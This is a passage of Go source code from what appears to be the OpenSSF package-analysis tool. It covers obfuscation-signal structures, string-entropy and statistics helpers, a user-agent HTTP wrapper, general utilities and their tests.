17 | 	IdentifierLengths valuecounts.ValueCounts
18 | 	StringLengths     valuecounts.ValueCounts
19 | 
20 | 	// SuspiciousIdentifiers holds identifiers that are deemed 'suspicious' (i.e.
21 | 	// indicative of obfuscation) according to certain rules. Each entry contains
22 | 	// the identifier name and the name of the first rule it was matched against.
23 | 	SuspiciousIdentifiers []staticanalysis.SuspiciousIdentifier
24 | 
25 | 	// EscapedStrings contain string literals that contain large amount of escape
26 | 	// characters, which may indicate obfuscation.
27 | 	EscapedStrings []staticanalysis.EscapedString
28 | 
29 | 	// Base64Strings holds a list of (substrings of) string literals found in the
30 | 	// file that match a base64 regex pattern. This patten has a minimum matching
31 | 	// length in order to reduce the number of false positives.
32 | 	Base64Strings []string
33 | 
34 | 	// HexStrings holds a list of (substrings of) string literals found in the
35 | 	// file that contain long (>8 digits) hexadecimal digit sequences.
36 | 	HexStrings []string
37 | 
38 | 	// IPAddresses contains any IP addresses found in string literals
39 | 	IPAddresses []string
40 | 
41 | 	// URLs contains any urls (http or https) found in string literals
42 | 	URLs []string
43 | }
44 | 
45 | func (s FileSignals) String() string {
46 | 	parts := []string{
47 | 		fmt.Sprintf("identifier length counts: %v", s.IdentifierLengths),
48 | 		fmt.Sprintf("string length counts: %v", s.StringLengths),
49 | 
50 | 		fmt.Sprintf("suspicious identifiers: %v", s.SuspiciousIdentifiers),
51 | 		fmt.Sprintf("escaped strings: %v", s.EscapedStrings),
52 | 		fmt.Sprintf("potential base64 strings: %v", s.Base64Strings),
53 | 		fmt.Sprintf("hex strings: %v", s.HexStrings),
54 | 		fmt.Sprintf("IP addresses: %v", s.IPAddresses),
55 | 		fmt.Sprintf("URLs: %v", s.URLs),
56 | 	}
57 | 	return strings.Join(parts, "\n")
58 | }
59 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/stats/sample_statistics_test.go:
--------------------------------------------------------------------------------
  1 | package stats
  2 | 
  3 | import (
  4 | 	"math"
  5 | 	"testing"
  6 | )
  7 | 
  8 | func TestSummary(t *testing.T) {
  9 | 	data := []int{1, 2, 3, 4, 5, 6, 7, 8, 9}
 10 | 	actual := Summarise(data)
 11 | 	expected := SampleStatistics{
 12 | 		Size:      9,
 13 | 		Mean:      5,
 14 | 		Variance:  7.5,
 15 | 		Skewness:  0,
 16 | 		Quartiles: [5]float64{1, 3, 5, 7, 9},
 17 | 	}
 18 | 	if !actual.Equals(expected, 1e-4) {
 19 | 		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
 20 | 	}
 21 | }
 22 | 
 23 | func TestSummary2(t *testing.T) {
 24 | 	data := []int{36, 7, 40, 41, 6, 42, 43, 47, 49, 15, 39}
 25 | 	actual := Summarise(data)
 26 | 	expected := SampleStatistics{
 27 | 		Size:      11,
 28 | 		Mean:      33.18181818181818,
 29 | 		Variance:  251.9636363636363,
 30 | 		Skewness:  -1.0634150819204964,
 31 | 		Quartiles: [5]float64{6, 15, 40, 43, 49},
 32 | 	}
 33 | 	if !actual.Equals(expected, 1e-4) {
 34 | 		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
 35 | 	}
 36 | }
 37 | 
 38 | func TestSummary3(t *testing.T) {
 39 | 	data := []int{36, 40, 7, 39, 15, 41}
 40 | 	actual := Summarise(data)
 41 | 	expected := SampleStatistics{
 42 | 		Size:      6,
 43 | 		Mean:      29.666666666666668,
 44 | 		Variance:  218.26666666666665,
 45 | 		Skewness:  -1.039599522561593,
 46 | 		Quartiles: [5]float64{7, 15, 37.5, 40, 41},
 47 | 	}
 48 | 	if !actual.Equals(expected, 1e-4) {
 49 | 		t.Errorf("Expected summary: %v\nactual summary: %v\n", expected, actual)
 50 | 	}
 51 | }
 52 | 
 53 | func TestSummary4(t *testing.T) {
 54 | 	var data []int
 55 | 	actual := Summarise(data)
 56 | 	nan := math.NaN()
 57 | 	expected := SampleStatistics{
 58 | 		Size:      0,
 59 | 		Mean:      nan,
 60 | 		Variance:  nan,
 61 | 		Skewness:  nan,
 62 | 		Quartiles: [5]float64{nan, nan, nan, nan, nan},
 63 | 	}
 64 | 	if !actual.Equals(expected, 1e-4) {
 65 | 		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
 66 | 	}
 67 | }
 68 | 
 69 | func TestSummary5(t *testing.T) {
 70 | 	data := []float64{1.5}
 71 | 	actual := Summarise(data)
 72 | 	nan := math.NaN()
 73 | 	expected := SampleStatistics{
 74 | 		Size:      1,
 75 | 		Mean:      1.5,
 76 | 		Variance:  nan,
 77 | 		Skewness:  nan,
 78 | 		Quartiles: [5]float64{1.5, 1.5, 1.5, 1.5, 1.5},
 79 | 	}
 80 | 	if !actual.Equals(expected, 1e-4) {
 81 | 		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
 82 | 	}
 83 | }
 84 | 
 85 | func TestSummary6(t *testing.T) {
 86 | 	data := []float64{1.5, 2.5}
 87 | 	actual := Summarise(data)
 88 | 	nan := math.NaN()
 89 | 	expected := SampleStatistics{
 90 | 		Size:      2,
 91 | 		Mean:      2.0,
 92 | 		Variance:  0.5,
 93 | 		Skewness:  nan,
 94 | 		Quartiles: [5]float64{1.5, 1.5, 2.0, 2.5, 2.5},
 95 | 	}
 96 | 	if !actual.Equals(expected, 1e-4) {
 97 | 		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
 98 | 	}
 99 | }
100 | 
101 | func TestSummary7(t *testing.T) {
102 | 	data := []float64{-12.5, 0, 12.5}
103 | 	actual := Summarise(data)
104 | 	expected := SampleStatistics{
105 | 		Size:      3,
106 | 		Mean:      0.0,
107 | 		Variance:  156.25,
108 | 		Skewness:  0,
109 | 		Quartiles: [5]float64{-12.5, -12.5, 0.0, 12.5, 12.5},
110 | 	}
111 | 	if !actual.Equals(expected, 1e-4) {
112 | 		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
113 | 	}
114 | }
115 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/stringentropy/string_entropy.go:
--------------------------------------------------------------------------------
  1 | package stringentropy
  2 | 
  3 | import (
  4 | 	"math"
  5 | 	"unicode/utf8"
  6 | )
  7 | 
  8 | /*
  9 | Calculate finds the entropy of a string S of characters over an alphabet A, which is defined as
 10 | 
 11 | 	E(S) = - sum(i in A) { (p(i)) * log(p(i)) },
 12 | 
 13 | where p(i) is the probability of observing character i, and the summation is performed over all characters in A.
 14 | If S is the empty string, we define E(S) to be 0.
 15 | 
 16 | The probabilities p(i) can be given a priori, or simply calculated by counting characters within the string S.
 17 | In the latter case, we have p(i) = c(i) / |S|, where c(i) counts the number of times character i appears in S,
 18 | and |S| is the length of S. Then,
 19 | 
 20 | 	E(S) = - sum(i in A) { (c(i) / |S|) * log(c(i) / |S|) }.
 21 | 
 22 | In this case, the maximum value for E is log(|S|). When the number of distinct characters in S is small,
 23 | the entropy approaches 0.
 24 | 
 25 | Reference: https://link.springer.com/chapter/10.1007/978-3-642-10509-8_19
 26 | */
 27 | func Calculate(s string, prob map[rune]float64) float64 {
 28 | 	if len(s) == 0 {
 29 | 		return 0
 30 | 	}
 31 | 
 32 | 	if prob == nil {
 33 | 		counts, sumCounts := CharacterCounts([]string{s})
 34 | 		prob = characterProbabilitiesFromCounts(counts, sumCounts)
 35 | 	}
 36 | 
 37 | 	entropy := 0.0
 38 | 	for _, char := range s {
 39 | 		p := prob[char]
 40 | 		if p > 0 {
 41 | 			entropy -= p * math.Log(p)
 42 | 		}
 43 | 	}
 44 | 
 45 | 	return entropy
 46 | }
 47 | 
 48 | /*
 49 | CalculateNormalised returns the string entropy normalised by the log of the length of the string.
 50 | This quantity is used because for log(N) is the maximum possible entropy out of all strings with length N,
 51 | where N > 0. Special cases are empty strings (0) and single character strings (1).
 52 | As a formula:
 53 | 
 54 | 	E_n(S) := {
 55 | 	    0,               if |S| = 0
 56 | 	    1,               if |S| = 1
 57 | 	    E(S) / log(|S|), otherwise
 58 | 	}
 59 | */
 60 | // TODO does this make sense when a general probability structure is used?
 61 | // TODO calculate max string entropy for a given set of character counts.
 62 | func CalculateNormalised(s string, prob map[rune]float64) float64 {
 63 | 	length := utf8.RuneCountInString(s)
 64 | 	switch length {
 65 | 	case 0:
 66 | 		return 0
 67 | 	case 1:
 68 | 		return 1
 69 | 	default:
 70 | 		return Calculate(s, prob) / math.Log(float64(length))
 71 | 	}
 72 | }
 73 | 
 74 | // CharacterCounts computes a map of character (rune) to number of occurrences
 75 | // in the input strings
 76 | func CharacterCounts(strs []string) (map[rune]int, int64) {
 77 | 	counts := make(map[rune]int)
 78 | 	var sumCounts int64 = 0
 79 | 	for _, s := range strs {
 80 | 		for _, b := range s {
 81 | 			counts[b] += 1
 82 | 			sumCounts += 1
 83 | 		}
 84 | 	}
 85 | 	return counts, sumCounts
 86 | }
 87 | 
 88 | // CharacterProbabilities computes a map of character (rune) to
 89 | // frequency/probability of occurrence in the input strings
 90 | func CharacterProbabilities(strs []string) map[rune]float64 {
 91 | 	counts, sumCounts := CharacterCounts(strs)
 92 | 	return characterProbabilitiesFromCounts(counts, sumCounts)
 93 | }
 94 | 
 95 | func characterProbabilitiesFromCounts(counts map[rune]int, sumCounts int64) map[rune]float64 {
 96 | 	prob := make(map[rune]float64, len(counts))
 97 | 	for char, count := range counts {
 98 | 		prob[char] = float64(count) / float64(sumCounts)
 99 | 	}
100 | 	return prob
101 | }
102 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/task.go:
--------------------------------------------------------------------------------
 1 | package staticanalysis
 2 | 
 3 | // A Task (static analysis task) refers to a particular type of static analysis to be performed.
 4 | // Some tasks may depend on other tasks, for example Signals depends on Parsing.
 5 | type Task string
 6 | 
 7 | // NOTE: the string values below should match the JSON field names in result.go.
 8 | const (
 9 | 	// Basic analysis consists of information about a file that can be determined
10 | 	// without parsing, for example file size, file type and hash.
11 | 	Basic Task = "basic"
12 | 
13 | 	// Parsing analysis involves using a programming language parser to extract
14 | 	// source code information from the file.
15 | 	Parsing Task = "parsing"
16 | 
17 | 	// Signals analysis involves using applying certain detection rules to extract
18 | 	// signals of interest from the code. It depends on the output of the Parsing task,
19 | 	// and does not require reading files directly.
20 | 	Signals Task = "signals"
21 | 
22 | 	// All is not a task itself, but represents/'depends on' all other tasks.
23 | 	All Task = "all"
24 | )
25 | 
26 | var allTasks = []Task{
27 | 	Basic,
28 | 	Parsing,
29 | 	Signals,
30 | }
31 | 
32 | func AllTasks() []Task {
33 | 	return allTasks[:]
34 | }
35 | 
36 | func TaskFromString(s string) (Task, bool) {
37 | 	switch Task(s) {
38 | 	case Basic:
39 | 		return Basic, true
40 | 	case Parsing:
41 | 		return Parsing, true
42 | 	case Signals:
43 | 		return Signals, true
44 | 	case All:
45 | 		return All, true
46 | 	default:
47 | 		return "", false
48 | 	}
49 | }
50 | 


--------------------------------------------------------------------------------
/internal/useragent/useragent.go:
--------------------------------------------------------------------------------
 1 | package useragent
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"net/http"
 6 | )
 7 | 
 8 | const defaultUserAgentFmt = "package-analysis (github.com/ossf/package-analysis%s)"
 9 | 
10 | type uaRoundTripper struct {
11 | 	parent    http.RoundTripper
12 | 	userAgent string
13 | }
14 | 
15 | // RoundTrip implements the http.RoundTripper interface.
16 | func (rt *uaRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) {
17 | 	req.Header.Set("User-Agent", rt.userAgent)
18 | 	return rt.parent.RoundTrip(req)
19 | }
20 | 
21 | // RoundTripper wraps parent with a RoundTripper that add a user-agent header
22 | // with the contents of ua.
23 | func RoundTripper(ua string, parent http.RoundTripper) http.RoundTripper {
24 | 	return &uaRoundTripper{
25 | 		parent:    parent,
26 | 		userAgent: ua,
27 | 	}
28 | }
29 | 
30 | // DefaultRoundTripper wraps parent with a RoundTripper that adds a default
31 | // Package Analysis user-agent header.
32 | //
33 | // If supplied, extra information can be added to the user-agent, allowing the
34 | // user-agent to be customized for production environments.
35 | func DefaultRoundTripper(parent http.RoundTripper, extra string) http.RoundTripper {
36 | 	if extra != "" {
37 | 		extra = ", " + extra
38 | 	}
39 | 	return RoundTripper(fmt.Sprintf(defaultUserAgentFmt, extra), parent)
40 | }
41 | 


--------------------------------------------------------------------------------
/internal/useragent/useragent_test.go:
--------------------------------------------------------------------------------
 1 | package useragent_test
 2 | 
 3 | import (
 4 | 	"net/http"
 5 | 	"net/http/httptest"
 6 | 	"testing"
 7 | 
 8 | 	"github.com/ossf/package-analysis/internal/useragent"
 9 | )
10 | 
11 | func TestRoundTripper(t *testing.T) {
12 | 	want := "test user agent string"
13 | 	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
14 | 		got := r.Header.Get("user-agent")
15 | 		if got != want {
16 | 			t.Errorf("User Agent = %q, want %q", got, want)
17 | 		}
18 | 		w.WriteHeader(http.StatusOK)
19 | 	}))
20 | 	defer ts.Close()
21 | 
22 | 	c := http.Client{
23 | 		Transport: useragent.RoundTripper(want, http.DefaultTransport),
24 | 	}
25 | 	resp, err := c.Get(ts.URL)
26 | 	if err != nil {
27 | 		t.Fatalf("Get() = %v; want no error", err)
28 | 	}
29 | 	if resp.StatusCode != http.StatusOK {
30 | 		t.Fatalf("Get() status = %v; want 200", resp.StatusCode)
31 | 	}
32 | }
33 | 
34 | func TestDefaultRoundTripper(t *testing.T) {
35 | 	want := "package-analysis (github.com/ossf/package-analysis, extra)"
36 | 	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
37 | 		got := r.Header.Get("user-agent")
38 | 		if got != want {
39 | 			t.Errorf("User Agent = %q, want %q", got, want)
40 | 		}
41 | 		w.WriteHeader(http.StatusOK)
42 | 	}))
43 | 	defer ts.Close()
44 | 
45 | 	c := http.Client{
46 | 		Transport: useragent.DefaultRoundTripper(http.DefaultTransport, "extra"),
47 | 	}
48 | 	resp, err := c.Get(ts.URL)
49 | 	if err != nil {
50 | 		t.Fatalf("Get() = %v; want no error", err)
51 | 	}
52 | 	if resp.StatusCode != http.StatusOK {
53 | 		t.Fatalf("Get() status = %v; want 200", resp.StatusCode)
54 | 	}
55 | }
56 | 
57 | func TestDefaultRoundTripper_NoExtra(t *testing.T) {
58 | 	want := "package-analysis (github.com/ossf/package-analysis)"
59 | 	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
60 | 		got := r.Header.Get("user-agent")
61 | 		if got != want {
62 | 			t.Errorf("User Agent = %q, want %q", got, want)
63 | 		}
64 | 		w.WriteHeader(http.StatusOK)
65 | 	}))
66 | 	defer ts.Close()
67 | 
68 | 	c := http.Client{
69 | 		Transport: useragent.DefaultRoundTripper(http.DefaultTransport, ""),
70 | 	}
71 | 	resp, err := c.Get(ts.URL)
72 | 	if err != nil {
73 | 		t.Fatalf("Get() = %v; want no error", err)
74 | 	}
75 | 	if resp.StatusCode != http.StatusOK {
76 | 		t.Fatalf("Get() status = %v; want 200", resp.StatusCode)
77 | 	}
78 | }
79 | 


--------------------------------------------------------------------------------
/internal/utils/combine_regexp.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"regexp"
 5 | 	"strings"
 6 | )
 7 | 
 8 | // CombineRegexp creates a single regexp by joining the argument regexps together
 9 | // using the | operator. Each regexp is put into a separate non-capturing group before
10 | // being combined.
11 | func CombineRegexp(regexps ...*regexp.Regexp) *regexp.Regexp {
12 | 	patterns := Transform(regexps, func(r *regexp.Regexp) string {
13 | 		// create a non-capturing group for each regexp
14 | 		return "(?:" + r.String() + ")"
15 | 	})
16 | 	return regexp.MustCompile(strings.Join(patterns, "|"))
17 | }
18 | 


--------------------------------------------------------------------------------
/internal/utils/combine_regexp_test.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"reflect"
 5 | 	"regexp"
 6 | 	"testing"
 7 | )
 8 | 
 9 | type combineRegexpTestCase struct {
10 | 	name    string
11 | 	regexps []*regexp.Regexp
12 | 	want    *regexp.Regexp
13 | }
14 | 
15 | func TestCombineRegexp(t *testing.T) {
16 | 	tests := []combineRegexpTestCase{
17 | 		{
18 | 			name: "a b c",
19 | 			regexps: []*regexp.Regexp{
20 | 				regexp.MustCompile("a"),
21 | 				regexp.MustCompile("b"),
22 | 				regexp.MustCompile("c"),
23 | 			},
24 | 			want: regexp.MustCompile("(?:a)|(?:b)|(?:c)"),
25 | 		},
26 | 		{
27 | 			name: "capturing groups",
28 | 			regexps: []*regexp.Regexp{
29 | 				regexp.MustCompile("([0-9])"),
30 | 				regexp.MustCompile("([a-z])"),
31 | 				regexp.MustCompile("([A-Z])"),
32 | 			},
33 | 			want: regexp.MustCompile("(?:([0-9]))|(?:([a-z]))|(?:([A-Z]))"),
34 | 		},
35 | 		{
36 | 			name: "conjunction and capturing groups",
37 | 			regexps: []*regexp.Regexp{
38 | 				regexp.MustCompile("(apple|pear)"),
39 | 				regexp.MustCompile("(red|blue)"),
40 | 				regexp.MustCompile("(up|down)"),
41 | 			},
42 | 			want: regexp.MustCompile("(?:(apple|pear))|(?:(red|blue))|(?:(up|down))"),
43 | 		},
44 | 		{
45 | 			name: "quantification",
46 | 			regexps: []*regexp.Regexp{
47 | 				regexp.MustCompile("[!@#$%^&*()]{1, 30}"),
48 | 				regexp.MustCompile("\\s+"),
49 | 				regexp.MustCompile("[[:xdigit:]]?"),
50 | 			},
51 | 			want: regexp.MustCompile("(?:[!@#$%^&*()]{1, 30})|(?:\\s+)|(?:[[:xdigit:]]?)"),
52 | 		},
53 | 		{
54 | 			name: "combine regexps with quantifications",
55 | 			regexps: []*regexp.Regexp{
56 | 				regexp.MustCompile("(apple|pear)"),
57 | 				regexp.MustCompile("(red|blue)"),
58 | 				regexp.MustCompile("(up|down)"),
59 | 			},
60 | 			want: regexp.MustCompile("(?:(apple|pear))|(?:(red|blue))|(?:(up|down))"),
61 | 		},
62 | 	}
63 | 	for _, tt := range tests {
64 | 		t.Run(tt.name, func(t *testing.T) {
65 | 			if got := CombineRegexp(tt.regexps...); !reflect.DeepEqual(got, tt.want) {
66 | 				t.Errorf("CombineRegexp() = %v, want %v", got, tt.want)
67 | 			}
68 | 		})
69 | 	}
70 | }
71 | 


--------------------------------------------------------------------------------
/internal/utils/comma_separated_flags.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"flag"
 5 | 	"strings"
 6 | )
 7 | 
 8 | // CommaSeparatedFlags creates a struct which can be used with the Golang flag library,
 9 | // to allow passing a comma-separated list of strings as a single command-line argument.
10 | //
11 | // Make sure to call InitFlag() on the returned struct before calling flag.Parse().
12 | func CommaSeparatedFlags(name string, values []string, usage string) CommaSeparatedFlagsData {
13 | 	return CommaSeparatedFlagsData{
14 | 		Name:   name,
15 | 		Values: values,
16 | 		Info:   usage,
17 | 	}
18 | }
19 | 
20 | type CommaSeparatedFlagsData struct {
21 | 	Name   string
22 | 	Values []string
23 | 	Info   string
24 | }
25 | 
26 | func (csl *CommaSeparatedFlagsData) Set(values string) error {
27 | 	csl.Values = strings.Split(values, ",")
28 | 	return nil
29 | }
30 | 
31 | func (csl *CommaSeparatedFlagsData) String() string {
32 | 	if csl.Values == nil {
33 | 		return ""
34 | 	} else {
35 | 		return strings.Join(csl.Values, ",")
36 | 	}
37 | }
38 | 
39 | func (csl *CommaSeparatedFlagsData) InitFlag() {
40 | 	flag.Var(csl, csl.Name, csl.Info)
41 | }
42 | 


--------------------------------------------------------------------------------
/internal/utils/equals.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 	"math"
 6 | 	"reflect"
 7 | )
 8 | 
 9 | // FloatEquals compares two floats and returns true if they are both
10 | // within absTol of each other, or are both NaN.
11 | // Note that normally NaN != NaN, but we define it as true because it's
12 | // convenient for comparing arrays and structs that contain floats.
13 | func FloatEquals(x1, x2, absTol float64) bool {
14 | 	return x1 == x2 || math.Abs(x1-x2) < absTol || (math.IsNaN(x1) && math.IsNaN(x2))
15 | }
16 | 
17 | // JSONEquals compares two byte sequences containing JSON data and returns true if
18 | // 1) both j1 and j2 contain valid JSON data, and
19 | // 2) the JSON objects that they represent are equal.
20 | // If j1 or j2 contain invalid JSON data, an error is returned.
21 | func JSONEquals(j1, j2 []byte) (bool, error) {
22 | 	// Adapted from https://stackoverflow.com/a/32409106
23 | 	var o1, o2 interface{}
24 | 	if err := json.Unmarshal(j1, &o1); err != nil {
25 | 		return false, err
26 | 	}
27 | 	if err := json.Unmarshal(j2, &o2); err != nil {
28 | 		return false, err
29 | 	}
30 | 	return reflect.DeepEqual(o1, o2), nil
31 | 
32 | }
33 | 


--------------------------------------------------------------------------------
/internal/utils/file_write_data_utils.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"os"
 5 | 	"path/filepath"
 6 | )
 7 | 
 8 | /*
 9 | Subfolder where write buffer data will be saved to disk before uploaded to a cloud bucket.
10 | This subfolder needs to be shared across files so all functions that access it will be defined here.
11 | */
12 | 
13 | const writeBufferFolder = "worker_tmp/write_buffers"
14 | 
15 | // CreateAndWriteTempFile writes a file in the directory specified by
16 | // writeBufferFolder.
17 | //
18 | // This directory must be cleaned up with a call to RemoveTempFilesDirectory().
19 | func CreateAndWriteTempFile(fileName string, data []byte) error {
20 | 	err := os.MkdirAll(writeBufferFolder, 0777)
21 | 	if err != nil {
22 | 		return err
23 | 	}
24 | 
25 | 	f, err := os.Create(filepath.Join(writeBufferFolder, fileName))
26 | 	if err != nil {
27 | 		return err
28 | 	}
29 | 	defer f.Close()
30 | 	_, err = f.Write(data)
31 | 	return err
32 | }
33 | 
34 | func OpenTempFile(fileName string) (*os.File, error) {
35 | 	return os.Open(filepath.Join(writeBufferFolder, fileName))
36 | }
37 | 
38 | func RemoveTempFilesDirectory() error {
39 | 	return os.RemoveAll(writeBufferFolder)
40 | }
41 | 


--------------------------------------------------------------------------------
/internal/utils/hash_file.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"crypto/sha256"
 5 | 	"fmt"
 6 | 	"io"
 7 | 	"os"
 8 | )
 9 | 
10 | // SHA256Hash returns the SHA256 hashsum of a file.
11 | func SHA256Hash(path string) (string, error) {
12 | 	f, err := os.Open(path)
13 | 	if err != nil {
14 | 		return "", err
15 | 	}
16 | 	defer f.Close()
17 | 
18 | 	hash := sha256.New()
19 | 	if _, err = io.Copy(hash, f); err != nil {
20 | 		return "", err
21 | 	}
22 | 
23 | 	return fmt.Sprintf("%x", hash.Sum([]byte{})), nil
24 | }
25 | 


--------------------------------------------------------------------------------
/internal/utils/hash_file_test.go:
--------------------------------------------------------------------------------
 1 | package utils_test
 2 | 
 3 | import (
 4 | 	"os"
 5 | 	"path/filepath"
 6 | 	"testing"
 7 | 
 8 | 	"github.com/ossf/package-analysis/internal/utils"
 9 | )
10 | 
11 | // pairs of strings and their SHA256 hash digests
12 | var hashPairs = [][2]string{
13 | 	{"", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},
14 | 	{"Hello, World!", "dffd6021bb2bd5b0af676290809ec3a53191dd81c7f70a4b28688a362182986f"},
15 | 	{"Hello,\nWorld!", "d62b51d504f02642dab5003959af0c1557094c7d49dcc544aba37a0a5d8d1d0d"},
16 | 	{"Hello,\nWorld!\n", "f5651768767f5e83d7001136251b6558a6d01550b04e12c1678ea3a0ca1e8a30"},
17 | }
18 | 
19 | func TestHashFile(t *testing.T) {
20 | 	tests := []struct {
21 | 		name     string
22 | 		contents string
23 | 		want     string
24 | 	}{
25 | 		{
26 | 			name:     "empty file",
27 | 			contents: hashPairs[0][0],
28 | 			want:     hashPairs[0][1],
29 | 		},
30 | 		{
31 | 			name:     "single line",
32 | 			contents: hashPairs[1][0],
33 | 			want:     hashPairs[1][1],
34 | 		},
35 | 		{
36 | 			name:     "multi line",
37 | 			contents: hashPairs[2][0],
38 | 			want:     hashPairs[2][1],
39 | 		},
40 | 		{
41 | 			name:     "trailing new line",
42 | 			contents: hashPairs[3][0],
43 | 			want:     hashPairs[3][1],
44 | 		},
45 | 	}
46 | 	for _, test := range tests {
47 | 		t.Run(test.name, func(t *testing.T) {
48 | 			f := filepath.Join(t.TempDir(), "file.txt")
49 | 			err := os.WriteFile(f, []byte(test.contents), 0o666)
50 | 			if err != nil {
51 | 				t.Fatalf("Failed to prepare hash file: %v", err)
52 | 			}
53 | 			got, err := utils.SHA256Hash(f)
54 | 			if err != nil {
55 | 				t.Fatalf("Failed to generate hash: %v", err)
56 | 			}
57 | 			if got != test.want {
58 | 				t.Errorf("SHA256Hash() = %v; want %v", got, test.want)
59 | 			}
60 | 		})
61 | 	}
62 | }
63 | 
64 | func TestHashFile_MissingFile(t *testing.T) {
65 | 	f := filepath.Join(t.TempDir(), "missing.txt")
66 | 	got, err := utils.SHA256Hash(f)
67 | 	if err == nil {
68 | 		t.Error("SHA256Hash() returned no error; want an error")
69 | 	}
70 | 	if got != "" {
71 | 		t.Errorf("SHA256Hash() = %v; want ''", got)
72 | 	}
73 | }
74 | 


--------------------------------------------------------------------------------
/internal/utils/last_bytes.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | // LastNBytes returns the last n bytes from b.
 4 | // If len(b) <= n, b itself is returned, otherwise a copy of the bytes is returned.
 5 | // If n is negative, the function will panic
 6 | func LastNBytes(b []byte, n int) []byte {
 7 | 	if n < 0 {
 8 | 		panic("n cannot be negative")
 9 | 	}
10 | 	if len(b) <= n {
11 | 		return b
12 | 	}
13 | 	return b[(len(b) - n):]
14 | }
15 | 


--------------------------------------------------------------------------------
/internal/utils/last_bytes_test.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"reflect"
 5 | 	"testing"
 6 | )
 7 | 
 8 | type lastNBytesTestCase struct {
 9 | 	name  string
10 | 	bytes []byte
11 | 	n     int
12 | 	want  []byte
13 | }
14 | 
15 | func TestLastNBytes(t *testing.T) {
16 | 	tests := []lastNBytesTestCase{
17 | 		{
18 | 			"empty_0",
19 | 			[]byte{},
20 | 			0,
21 | 			[]byte{},
22 | 		},
23 | 		{
24 | 			"empty_10",
25 | 			[]byte{},
26 | 			10,
27 | 			[]byte{},
28 | 		},
29 | 		{
30 | 			"abcd_0",
31 | 			[]byte{'a', 'b', 'c', 'd'},
32 | 			0,
33 | 			[]byte{},
34 | 		},
35 | 		{
36 | 			"abcd_1",
37 | 			[]byte{'a', 'b', 'c', 'd'},
38 | 			1,
39 | 			[]byte{'d'},
40 | 		},
41 | 		{
42 | 			"abcd_4",
43 | 			[]byte{'a', 'b', 'c', 'd'},
44 | 			4,
45 | 			[]byte{'a', 'b', 'c', 'd'},
46 | 		},
47 | 		{
48 | 			"abcd_5",
49 | 			[]byte{'a', 'b', 'c', 'd'},
50 | 			5,
51 | 			[]byte{'a', 'b', 'c', 'd'},
52 | 		},
53 | 	}
54 | 	for _, tt := range tests {
55 | 		t.Run(tt.name, func(t *testing.T) {
56 | 			if got := LastNBytes(tt.bytes, tt.n); !reflect.DeepEqual(got, tt.want) {
57 | 				t.Errorf("LastNBytes() = %v, want %v", got, tt.want)
58 | 			}
59 | 		})
60 | 	}
61 | }
62 | 


--------------------------------------------------------------------------------
/internal/utils/remove_duplicates.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | /*
 4 | RemoveDuplicates takes a slice and returns a new slice with only the
 5 | unique elements from the input slice. Ordering of the elements in the
 6 | returned slice corresponds is done according to the earliest index
 7 | of each unique value in the input slice.
 8 | */
 9 | func RemoveDuplicates[T comparable](items []T) []T {
10 | 	seenItems := make(map[T]struct{}) // empty structs take up no space
11 | 	var uniqueItems []T
12 | 	for _, item := range items {
13 | 		if _, seen := seenItems[item]; !seen {
14 | 			seenItems[item] = struct{}{}
15 | 			uniqueItems = append(uniqueItems, item)
16 | 		}
17 | 	}
18 | 	return uniqueItems
19 | }
20 | 


--------------------------------------------------------------------------------
/internal/utils/transform.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | // Transform applies the given transform function fn: T -> R to each element t of slice ts
 4 | // and returns a slice containing the corresponding results.
 5 | func Transform[T, R any](ts []T, fn func(T) R) []R {
 6 | 	result := make([]R, len(ts))
 7 | 	for i, t := range ts {
 8 | 		result[i] = fn(t)
 9 | 	}
10 | 	return result
11 | }
12 | 


--------------------------------------------------------------------------------
/internal/utils/write_file.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"os"
 6 | )
 7 | 
 8 | /*
 9 | WriteFile writes the given file contents to the given path.
10 | The file may optionally be marked as executable.
11 | */
12 | func WriteFile(path string, contents []byte, executable bool) error {
13 | 	if err := os.WriteFile(path, contents, 0o666); err != nil {
14 | 		return err
15 | 	}
16 | 
17 | 	if executable {
18 | 		if err := os.Chmod(path, 0o777); err != nil {
19 | 			return fmt.Errorf("could not set exec permissions on %s: %w", path, err)
20 | 		}
21 | 	}
22 | 
23 | 	return nil
24 | }
25 | 


--------------------------------------------------------------------------------
/internal/worker/code_execution.go:
--------------------------------------------------------------------------------
 1 | package worker
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"log/slog"
 6 | 	"os"
 7 | 	"path/filepath"
 8 | 	"regexp"
 9 | 
10 | 	"github.com/ossf/package-analysis/internal/sandbox"
11 | )
12 | 
13 | // sandboxExecutionLogPath is the absolute path of the execution log file
14 | // inside the sandbox. This file is used for logging during the execute phase.
15 | const sandboxExecutionLogPath = "/execution.log"
16 | 
17 | var nonSpaceControlChars = regexp.MustCompile("[\x00-\x08\x0b-\x1f\x7f]")
18 | 
